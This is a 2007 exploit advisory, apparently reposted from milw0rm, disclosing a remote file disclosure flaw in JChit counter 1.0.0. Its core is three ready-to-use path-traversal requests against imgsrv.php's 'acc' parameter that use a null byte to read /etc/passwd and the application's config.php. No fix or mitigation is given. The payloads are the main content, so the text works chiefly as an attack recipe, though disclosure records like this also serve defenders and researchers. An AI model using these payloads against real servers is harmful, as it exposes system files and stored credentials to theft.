Security Advisory: JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability
  Maran PHP Forum (forum_write.
php) Remote Code Execution Vulnerability
  GPB bulletin board Remote file include
  AWBS v2.4.0 Remote file include[cart2.php]

From: Dj7xpl <dj7xpl_(at)_yahoo.com>
Date: 30.04.2007
Subject: JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability

                                                    Y! Underground Group
       http://2600.ir

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Portal.......:   jchit counter v1.0.0
Download.....:   http://developers.jccorp.net
Type.........:   Remote File Disclosure Vulnerability
Author.......:   Dj7xpl / dj7xpl@2600.ir
HomePage.....:   http://Dj7xpl.2600.ir

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

Bug..........:

imgsrv.php?acc=[Local File]%00
imgsrv.php?acc=../../../../../etc/passwd%00
imgsrv.php?acc=../config.php%00

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-22]